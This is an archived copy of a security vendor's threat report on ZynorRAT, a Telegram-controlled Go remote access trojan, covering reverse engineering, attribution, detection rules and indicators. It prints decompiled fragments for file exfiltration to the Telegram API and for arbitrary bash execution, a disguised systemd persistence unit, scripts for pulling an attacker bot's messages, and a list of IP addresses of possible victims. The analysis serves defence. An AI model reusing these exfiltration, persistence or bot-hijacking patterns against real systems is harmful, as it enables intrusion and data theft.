{
	"id": "8c4772f4-ae5d-4104-af9d-50f69d931535",
	"created_at": "2026-04-06T00:20:14.862475Z",
	"updated_at": "2026-04-10T03:21:30.839887Z",
	"deleted_at": null,
	"sha1_hash": "9ba718ee4256b979c9a2bc8ac546cc3f5a9f245e",
	"title": "ZynorRAT technical analysis: Reverse engineering a novel, Turkish Go-based RAT",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2840781,
	"plain_text": "ZynorRAT technical analysis: Reverse engineering a novel,\r\nTurkish Go-based RAT\r\nBy Alessandra Rizzo\r\nPublished: 2025-09-09 · Archived: 2026-04-05 23:12:03 UTC\r\nPublished:\r\nSeptember 9, 2025\r\nTable of contents\r\nfalco feeds by sysdig\r\nFalco Feeds extends the power of Falco by giving open source-focused companies\r\naccess to expert-written rules that are continuously updated as new threats are\r\ndiscovered.\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 1 of 25\n\nlearn more\r\nIntroduction\r\nDuring a recent threat hunting exercise, the Sysdig Threat Research Team (TRT) identified a new sample we have\r\ndubbed ZynorRAT. It is a Go-based Remote Access Trojan (RAT) that provides a full suite of custom command\r\nand control (C2) capabilities for both Linux and Windows.\r\nZynorRAT was first submitted to VirusTotal on July 8, 2025, and has no significant similarities to other known\r\nmalware families. We are confident that the developer is actively working on making ZynorRAT malware less\r\ndetectable, as seen through multiple uploads to VirusTotal, where the detection count drops. The use of Telegram\r\nto control the botnet simplifies management and allows the author to automate their actions. Based on Telegram\r\nchats, network logs, strings discovered during reverse engineering, and VirusTotal telemetry, TRT is confident that\r\nZynorRAT is of Turkish origin.\r\nBy monitoring Telegram channels associated with the malware, we have been able to observe the malware’s\r\ndevelopment and speculate that the author’s goal is to sell it once completed. To better understand ZynorRAT, we\r\nhave analyzed its capabilities, explored attribution, and provided detections and indicators of compromise (IoCs).\r\nExplore our complete technical analysis below.\r\nZynorRAT for Linux\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 2 of 25\n\nZynorRAT was developed in Go and offers multiple capabilities to the attacker. Its main purpose is to serve as a\r\ncollection, exfiltration, and remote access tool, which is centrally managed through a Telegram bot. Telegram\r\nserves as the main C2 infrastructure through which the malware receives further commands once deployed on a\r\nvictim machine.\r\nWe found several instances of this malware on VirusTotal, which was first uploaded under the name “zynor” on\r\nJuly 8, 2025, and was flagged as malicious by only 22 of 66 security vendors. It was then reuploaded two days\r\nlater, on July 10, with a lower malicious score; only 16 out of 66 vendors detected it. This likely indicates the\r\ndeveloper is refining ZynorRAT to make it less detectable.\r\nTechnical analysis\r\nThe binary we analyzed, SHA256 bceccc566fe3ae3675f7e20100f979eaf2053d9a4f3a3619a550a496a4268ef5, is\r\nan ELF 64-bit executable compiled for x86-64 with Go. The binary is not packed or stripped and contains most of\r\nits functionality, symbols, and artifacts in clear text. Its size is almost 10 MB, which is particularly large but\r\nexpected for Go-compiled executables.\r\nUsing radare2 for reverse engineering, we were able to uncover the main functions of the malware, along with\r\ntheir wrapper functions, as detailed below. This provided a good starting point for the decompiling phase, where\r\nwe uncovered significant details of ZynorRAT’s inner workings.\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 3 of 25\n\nThe functions and their logic remained unchanged across all seven of the Linux samples we analyzed, which are\r\nprovided in the IoCs section.\r\nThe malware is a RAT that, upon landing on a victim machine, performs operations requested by the remote\r\nattacker through a Telegram bot, which turns the bot into a C2 suite. The malware currently supports several\r\nfunctions, such as file exfiltration, system enumeration, screenshot capture, persistence through systemd services,\r\nand arbitrary command execution.\r\nWe ascertained from the attacker’s chat with the bot that once the attacker sends a command to the victim's\r\nmachine, the victim responds within the same minute with the command result. Anything sent to the attacker not\r\nwithin the hardcoded commands is executed as a bash command by prepending “bash -c” to the string sent over.\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 4 of 25\n\nDiscovery\r\nThe function handleListDirectory , invoked by the /fs_list command received by the C2, is responsible for\r\nenumerating directories on a victim machine, then logging and sending its findings back to the Telegram bot. Each\r\nentry's name is concatenated with a newline (\\n) , and the string is grown dynamically if needed using a\r\nruntime.growslice call.\r\nThe function handleMetrics , invoked by the /metrics command received from the bot, is responsible for\r\nperforming system enumeration and profiling. It does so by first making an HTTP request to the domain\r\n“api.ipify.org”, which returns the IP address of the victim machine. It also enumerates the hostname and the\r\ncurrent user.\r\nos.hostname();\r\n os/user.Current();\r\n net/http.(*Client).Get((http.Client *)net/http.DefaultClient,\"https://api.ipify.org\",0x15);\r\nThe function handleListProcesses is invoked upon receiving the /proc_list command from the C2, and it\r\nuses the os.exec function to execute a ps command on the victim machine. It concatenates its findings and\r\nsends them back to the C2.\r\nos/exec.Command(\"ps\",2,\u0026local_18,1,1);\r\n os/exec.(*Cmd).CombinedOutput(this);\r\n fmt.Sprintf(\u0026DAT_007cd3eb,0x21,\u0026local_28,1,1);\r\n main.sendMessage(extraout_RAX_00,0x21);\r\n...\r\n runtime.concatstring2(0,\u0026DAT_007cb8dc,0x1e,extraout_RAX,2);\r\n main.sendMessage(extraout_RAX_01,\u0026DAT_007cb8dc);\r\nExfiltration\r\nThe function handleGetFile , which is invoked by the /fs_get command, is responsible for processing file\r\nrequests from the C2. It contains several validation steps to check if the file exists and whether it is accessible; if\r\nnot, it logs the error and sends it back to the C2. If the requested file is found, the function calls the\r\nsendDocument function, which is responsible for ultimately exfiltrating the file. It does so by preparing a buffer\r\ncontaining the file content in bytes, as part of the final HTTP request that will send the file back to the Telegram\r\nbot.\r\n/* Name: main.sendDocument\r\n Start: 006bc8a0\r\n End: 006bd240 */\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 5 of 25\n\nvoid main.sendDocument(undefined8 param_1,long param_2,undefined8 param_3,undefined8 param_4)\r\n{\r\n...\r\n os.OpenFile(param_1,local_e8,0,0);\r\n /* D:/halil/lrat/main.go:391 */\r\n return;\r\n }\r\n...\r\n mime/multipart.(*Writer).WriteField(this,\"chat_id\",7,extraout_RAX_05,2);\r\n /* D:/halil/lrat/main.go:403 */\r\n mime/multipart.(*Writer).WriteField\r\n (this,\"caption\",7,uStack0000000000000018,uStack0000000000000020);\r\n mime/multipart.(*Writer).CreateFormFile(this,\"document\",8,extraout_RAX_06,lVar1);\r\n puVar4 = go:itab.*os.File,io.Reader;\r\n io.copyBuffer(extraout_RAX_07,\"document\",go:itab.*os.File,io.Reader,extraout_RAX,0,0,0);\r\n...\r\n return;\r\n}\r\nThe function handleScreenshot is invoked upon receiving the /capture_display command from the C2, and\r\nit implements the benign open source tool screenshot. It effectively captures the desktop screen by first\r\nenumerating the number of active displays, capturing their contents, and then transforming the PNG content into\r\nan encoded version that is sent to the Telegram bot.\r\ngithub.com/kbinani/screenshot.NumActiveDisplays();\r\n github.com/kbinani/screenshot.GetDisplayBounds(lVar2);\r\n github.com/kbinani/screenshot.Capture(0,0,lVar3,lVar4);\r\n os.CreateTemp(0,0,\u0026DAT_007c49ad,0x10);\r\n runtime.newobject(\u0026datatype.Struct.png.Encoder);\r\n image/png.(*Encoder).Encode (this,go:itab.*os.File,io.Writer,extraout_RAX_02,go:itab.*image.RGBA,image.Image,\r\n extraout_RAX_01);\r\n main.sendMessage(extraout_RAX_04,0x1f);\r\n os.(*file).close((os.file *)*extraout_RAX_02);\r\n main.sendDocument(*(undefined8 *)(*extraout_RAX_02 + 0x38),\r\nWe saw evidence of the attacker invoking this function during our investigation of the Telegram chat between the\r\nattacker and the bot, as shown below:\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 6 of 25\n\nUser “134errors” sends the command /capture_display , and the bot immediately sends back a screenshot of the\r\nvictim's desktop.\r\nPersistence\r\nZynorRAT implements a persistence mechanism by exploiting systemd user services. Systemd allows for user-specific service definition files under “~/.config/systemd/user”, which is not commonly seen. It does so by\r\ncreating a service file at the path ~/.config/systemd/user/system-audio-manager.service, which contains the\r\nfollowing:\r\n[Unit]\r\nDescription=System Audio Core Service\r\nAfter=network.target\r\n[Service]\r\nExecStart=/home/user/.local/bin/audio\r\nRestart=always\r\nRestartSec=10\r\n[Install]\r\nWantedBy=default.target\r\nIt loads the new service file by executing:\r\nsystemctl --user daemon-reload\r\nImpact\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 7 of 25\n\nThe tool is able to kill a running process on the victim machine if the command /proc_kill is received from\r\nthe C2. It does so by executing the kill command along with the PID of the targeted process. The PID is\r\nplausibly known due to the earlier described handleListProcess function, which returns a list of running\r\nprocesses. The result of the kill operation is then logged and sent back as a notification to the C2.\r\nos/exec.Command(\"kill\",4,\u0026local_28,2,2);\r\n os/exec.(*Cmd).Run(this);\r\n main.sendMessage(extraout_RAX_00,0x22);\r\nShell execution\r\nIf no commands have been received yet by the C2, the fallback and default behavior of this malware is to execute\r\ncommands on the machine for anything that is sent over by the C2. If the attacker’s input received by the malware\r\ndoes not match any of the command instructions listed above, the input itself is parsed and executed by default\r\nwith bash -c \u003ccommand\u003e.\r\nThis effectively acts as a command executor for the attacker and allows them to achieve remote code execution on\r\nthe victim's machine.\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 8 of 25\n\nhandleShellCommand\r\nlocal_48 = \"-c\";\r\n os/exec.Command(\"bash\",4,\u0026local_48,2,2);\r\n os/exec.(*Cmd).CombinedOutput(this);\r\nWe found evidence of this function being used during our investigation of the Telegram chat. In one instance, the\r\nattacker sent over the command sudo su to execute on the victim's machine. The bot promptly executed the\r\ncommand and returned a log message.\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 9 of 25\n\nZynorRAT for Windows\r\nThe Windows version of ZynorRAT was also compiled with Go and is identical to the Linux version. The same\r\nfunctions are also present, along with the Telegram bot information.\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 10 of 25\n\nThis version of the malware was not adapted for Windows. Despite being compiled as a Windows executable, it\r\nperforms Linux-only persistence logic using systemd commands and .config paths.\r\nIt is plausible to think that the malware developer was trying to check VirusTotal’s detection capabilities and has\r\nnot fully developed the Windows version of ZynorRAT yet.\r\nTelegram C2\r\nWe were able to extract Telegram bot information using Tosint.\r\nWe found a dedicated bot named “lrat,” active on Telegram as the user “lraterrorsbot”.\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 11 of 25\n\nCommunicating files with the ZynorRAT bot can be tracked in VirusTotal.\r\nSince the chat_id value from the decompiled binary was not entirely retrievable, we polled the bot for updates\r\nusing the following Python script:\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 12 of 25\n\nimport requests\r\nimport time\r\n# === CONFIG ===\r\nBOT_TOKEN = '\u003cattacker_token\u003e'\r\nAPI_URL = f'https://api.telegram.org/bot{BOT_TOKEN}/getUpdates'\r\nTIMEOUT = 60 # seconds\r\nPOLL_INTERVAL = 1 # delay\r\n# === STATE ===\r\nlast_update_id = None\r\nprint(\"Starting Telegram long-polling...\")\r\nwhile True:\r\n try:\r\n params = {\r\n 'timeout': TIMEOUT,\r\n }\r\n if last_update_id is not None:\r\n params['offset'] = last_update_id + 1\r\n response = requests.get(API_URL, params=params, timeout=TIMEOUT + 5)\r\n result = response.json()\r\n if result.get(\"ok\") and result.get(\"result\"):\r\n for update in result[\"result\"]:\r\n update_id = update[\"update_id\"]\r\n print(f\"[+] New update: {update}\")\r\n last_update_id = update_id\r\n else:\r\n time.sleep(POLL_INTERVAL)\r\n except Exception as e:\r\n print(f\"[!] Error: {e}\")\r\n time.sleep(5)\r\nWe left the script running for over 10 days, and we finally received an update from the attacker’s chat, revealing\r\nits ID and the text sent to the bot, “ip” and “id”.\r\nWith the chat ID obtained, we were then able to make a simple Bash script to forward all past messages from the\r\nattacker’s chat with the bot to a script that records the chatter.\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 13 of 25\n\nbot_token=\"\u003cattacker's bot token\u003e\" # Bot token\r\nfrom_chat_id=\"\u003cattacker's chat id\u003e\" # Attacker's chat ID\r\nto_chat_id=\"\u003cour chat id\u003e\" # Our chat ID with the bot\r\nfor message_id in $(seq 1 1000); do\r\n curl -s -X POST \"https://api.telegram.org/bot${bot_token}/forwardMessage\" \\\r\n -H \"Content-Type: application/json\" \\\r\n -d \"{\\\"from_chat_id\\\":\\\"${from_chat_id}\\\",\\\"chat_id\\\":\\\"${to_chat_id}\\\",\\\"message_id\\\":${message_id}}\"\r\ndone\r\nThe attacker’s chat revealed ample evidence of compromise, commands executed, and many screenshots taken\r\nfrom the victim's host as shown in previous examples.\r\nWe were also able to reveal that the executables are distributed by the attacker using Dosya.co, a file-sharing\r\nservice.\r\nScreenshot obtained from the bot\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 14 of 25\n\nAs seen in the image, the executable zynor is still hosted on the website at the time of this writing.\r\nWe have also confirmed that the malware seems to be in its early stages of development. There are many\r\nscreenshots from, plausibly, the attacker’s own test machines that show the attacker compiling and running the\r\nRAT using VSCode and the go run command, and further executing commands such as /capture_display to\r\ncheck whether the functionality actually works.\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 15 of 25\n\nGiven that the bot reports information about the machine where it landed, with an example detailed below, we\r\nwere able to extract the following IP addresses from the Telegram messages.\r\nIP Address ASN ISP\r\n34.139.81.65 AS396982 Google LLC\r\n176.88.126.219 AS34984 Superonline Iletisim Hizmetleri A.S.\r\n35.190.164.155 AS396982 Google LLC\r\n107.167.160.16 AS396982 Google LLC\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 16 of 25\n\n185.171.76.209 AS62336 PURtel.com GmbH\r\n154.61.71.50 AS174 Cogent Communications\r\n136.144.33.66 AS206092 Internet Utilities Europe and Asia Limited\r\n136.144.33.64 AS206092 Internet Utilities Europe and Asia Limited\r\n176.238.224.71 AS16135 Turkcell A.S.\r\n20.99.160.173 AS8075 Microsoft Corporation\r\n35.203.161.183 AS396982 Google LLC\r\n35.238.198.203 AS396982 Google LLC\r\n199.203.206.147 AS1680 Cellcom Fixed Line Communication L.P\r\n194.154.78.140 AS3216 PJSC \"Vimpelcom\"\r\n79.104.209.186 AS3216 PJSC \"Vimpelcom\"\r\n213.33.190.106 AS3216 PJSC \"Vimpelcom\"\r\n40.80.158.10 AS8075 Microsoft Corporation\r\n213.33.190.139 AS3216 PJSC \"Vimpelcom\"\r\n194.154.78.108 AS3216 PJSC \"Vimpelcom\"\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 17 of 25\n\n79.104.209.92 AS3216 PJSC \"Vimpelcom\"\r\n64.124.77.153 AS6461 Zayo Bandwidth\r\n195.74.76.223 AS198605 Gen Digital dba as Avast\r\n140.228.21.191 AS174 Cogent Communications\r\n87.166.58.36 AS3320 Deutsche Telekom AG\r\n138.199.28.251 AS212238 Datacamp Limited\r\n107.167.163.178 AS396982 Google LLC\r\n34.171.15.117 AS396982 Google LLC\r\n178.244.44.146 AS16135 Turkcell A.S.\r\n35.186.88.97 AS396982 Google LLC\r\n34.133.16.226 AS396982 Google LLC\r\n104.196.52.179 AS396982 Google LLC\r\n35.223.219.31 AS396982 Google LLC\r\n34.45.247.65 AS396982 Google LLC\r\n34.61.57.114 AS396982 Google LLC\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 18 of 25\n\n194.154.78.146 AS3216 PJSC \"Vimpelcom\"\r\n213.33.190.152 AS3216 PJSC \"Vimpelcom\"\r\n195.68.142.27 AS3216 PJSC \"Vimpelcom\"\r\n213.33.190.191 AS3216 PJSC \"Vimpelcom\"\r\n194.154.78.215 AS3216 PJSC \"Vimpelcom\"\r\n195.68.142.8 AS3216 PJSC \"Vimpelcom\"\r\n79.104.209.215 AS3216 PJSC \"Vimpelcom\"\r\n79.104.209.144 AS3216 PJSC \"Vimpelcom\"\r\n79.104.209.84 AS3216 PJSC \"Vimpelcom\"\r\n194.154.78.212 AS3216 PJSC \"Vimpelcom\"\r\n194.154.78.207 AS3216 PJSC \"Vimpelcom\"\r\n185.244.192.175 AS197540 netcup GmbH\r\n93.216.69.15 AS3320 Deutsche Telekom AG\r\n217.131.107.38 AS34984 Superonline Iletisim Hizmetleri A.S.\r\n35.186.22.151 AS396982 Google LLC\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 19 of 25\n\n34.27.187.90 AS396982 Google LLC\r\n77.37.103.74 AS62336 PURtel.com GmbH\r\n24.99.144.70 AS7922 Comcast Cable Communications, LLC\r\n195.239.51.34 AS3216 PJSC \"Vimpelcom\"\r\n102.129.152.199 AS174 Cogent Communications\r\n185.93.40.66 AS35526 Smart Technology LLC\r\n198.44.129.137 AS11878 tzulo, inc.\r\n18.217.255.5 AS16509 Amazon.com, Inc.\r\n18.119.9.54 AS16509 Amazon.com, Inc.\r\n18.224.19.240 AS16509 Amazon.com, Inc.\r\nA significant number of them belong to cloud providers, which makes it reasonable to think that the attacker\r\nstarted testing their malware around July 9th by installing it on cloud instances that do not really belong to victim\r\nmachines. In this case, a test of reverse IP lookup on some of the Amazon IPs did reveal that they map to EC2\r\ninstances.\r\nIt is also reasonable to think that some of the Turkish IP addresses belong to the attacker. Nonetheless, we cannot\r\ndiscount that some of the extracted IPs may belong to potential victims.\r\nAttribution\r\nIn most of our analysis, the name “halil” has appeared several times in the decompiled binary and later in\r\nscreenshots from the attacker's machine that we retrieved through Telegram. It is plausible to think that the\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 20 of 25\n\nattacker’s name or nickname may be “halil,” and that this RAT is the work (in progress) of a single individual. We\r\npredict that this malware, still in early stages of development, may start to appear for sale in underground markets.\r\nThis is not an uncommon occurrence, where a relatively skilled malicious actor develops malware with the sole\r\npurpose of selling it to others and not to conduct malicious operations themselves. For example, below is a\r\nscreenshot of a similar malware, “SilentEye” that was being sold on an underground forum in January 2025 and\r\nreported by ThreatMon on X.\r\nWe have not found any evidence on underground forums that this malware is being actively sold. Since we believe\r\nthe attacker is in the early stages of development, ZynorRAT is likely not yet publicly released.\r\nDetection\r\nSysdig Secure customers are protected from the ZynorRAT threat with the following rules. Depending on the\r\ncommands run by the attacker, additional threat detections will trigger, such as persistence commands.\r\nDNS Lookup for Reconnaissance Service Detected (Sysdig Runtime Notable Events)\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 21 of 25\n\nDNS Lookup for Suspicious Domain Detected (Sysdig Runtime Notable Events)\r\nMAL_ZYNOR Yara Rule (Malware Detection policy)\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 22 of 25\n\nrule MAL_ZYNOR {\r\n meta:\r\n md5 = \"7422122eec7cfb3ec44737607d3ff5d2\"\r\n description = \"Detects ZynorRAT\"\r\n author = \"Sysdig TRT\"\r\n date = \"2025-08-04\"\r\n tags = \"zynor, ELF\"\r\n reference = \"Internal Research\"\r\n version = \"1.0\"\r\n strings:\r\n $s1 = \"main.handleShellCommand\"\r\n $s2 = \"main.handlePersistence\"\r\n $s3 = \"https://api.telegram.org/bot%s/sendMessage?chat_id=%d\u0026text=%s\" ascii\r\n $s4 = \"https://api.telegram.org/bot%s/sendDocument\" ascii\r\n condition:\r\n uint32(0) == 0x464c457f and\r\n 1 of ($s1, $s2) and\r\n1 of ($s3, $s4)\r\n}\r\nConclusion\r\nAlthough the malware ecosystem has no shortage of RATs, malware developers are still dedicating their time to\r\ncreating them from scratch. ZynorRAT is a novel malicious access trojan that was developed in Go and is still in\r\nits early stages, as highlighted by the numerous testing screenshots and commands we were able to retrieve from\r\nits integrated Telegram bot. ZynorRAT’s customization and automated controls underline the evolving\r\nsophistication of modern malware, even within their earliest stages.\r\nWe assess with high confidence that this tool will soon hit the underground markets, either on forums or via\r\nTelegram, where the sale of malicious software is common. ZynorRAT provides several critical capabilities, such\r\nas file exfiltration, reconnaissance and discovery, persistence, and remote code execution on victim machines. We\r\npredict that the malware author will continue developing the Windows version of the malware to improve their\r\nreach.\r\nRuntime threat detection remains critical to a defense-in-depth strategy to detect these types of threats. Linux is\r\nbecoming increasingly targeted by threat actors, and the number of tools available to them continues to increase.\r\nAppendix\r\nCommands used by ZynorRAT\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 23 of 25\n\nCommand Match Handler Called Behavior Description\r\n/help main.sendMessage Displays help message\r\n/fs_get  main.handleGetFile File exfiltration\r\n/fs_list  main.handleListDirectory List directory contents\r\n/metrics  main.handleMetrics Gather system metrics\r\n/persistence  main.handlePersistence Establish persistence (e.g., autorun)\r\n/proc_kill main.handleKillProcess Kill process\r\n/proc_list  main.handleListProcesses List running processes\r\n/capture_display main.handleScreenshot Take screenshot\r\nAnything else main.handleShellCommand Executes arbitrary shell commands\r\nIoCs\r\nWindows\r\n037e5fe028a60604523b840794d06c8f70a9c523a832a97ecaaccd9f419e364a\r\n47338da15a35c49bcd3989125df5b082eef64ba646bb7a2db1565bb413b69323\r\nc890c6e6b7cc6984cd9d9061d285d814841e0b8136286e6fd943013260eb8461\r\nLinux\r\n237a40e522f2f1e6c71415997766b4b23f1526e2f141d68ff334de3ff5b0c89f\r\n48c2a8453feea72f8d9bfb9c2731d811e7c300f3e1935bddd7188324aab7d30d\r\n4cd270b49c8d5c31560ef94dc0bee2c7927d6f3e77173f660e2f3106ae7131c3\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 24 of 25\n\na6c450f9abff8a22445ba539c21b24508dd326522df525977e14ec17e11f7d65\r\nbceccc566fe3ae3675f7e20100f979eaf2053d9a4f3a3619a550a496a4268ef5\r\n8b09ba6e006718371486b3655588b438ade953beecf221af38160cbe6fedd40a\r\nf9eb2a54e500b3ce42950fb75af30955180360c978c00d081ea561c86e54262d\r\nDomains\r\napi.telegram.org\r\nThreat Research\r\nCloud Security\r\nfeatured resources\r\nTest drive the right way to defend the cloudwith a security expert\r\nSource: https://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nhttps://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat\r\nPage 25 of 25",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sysdig.com/blog/zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat"
	],
	"report_names": [
		"zynorrat-technical-analysis-reverse-engineering-a-novel-turkish-go-based-rat"
	],
	"threat_actors": [],
	"ts_created_at": 1775434814,
	"ts_updated_at": 1775791290,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/9ba718ee4256b979c9a2bc8ac546cc3f5a9f245e.pdf",
		"text": "https://archive.orkl.eu/9ba718ee4256b979c9a2bc8ac546cc3f5a9f245e.txt",
		"img": "https://archive.orkl.eu/9ba718ee4256b979c9a2bc8ac546cc3f5a9f245e.jpg"
	}
}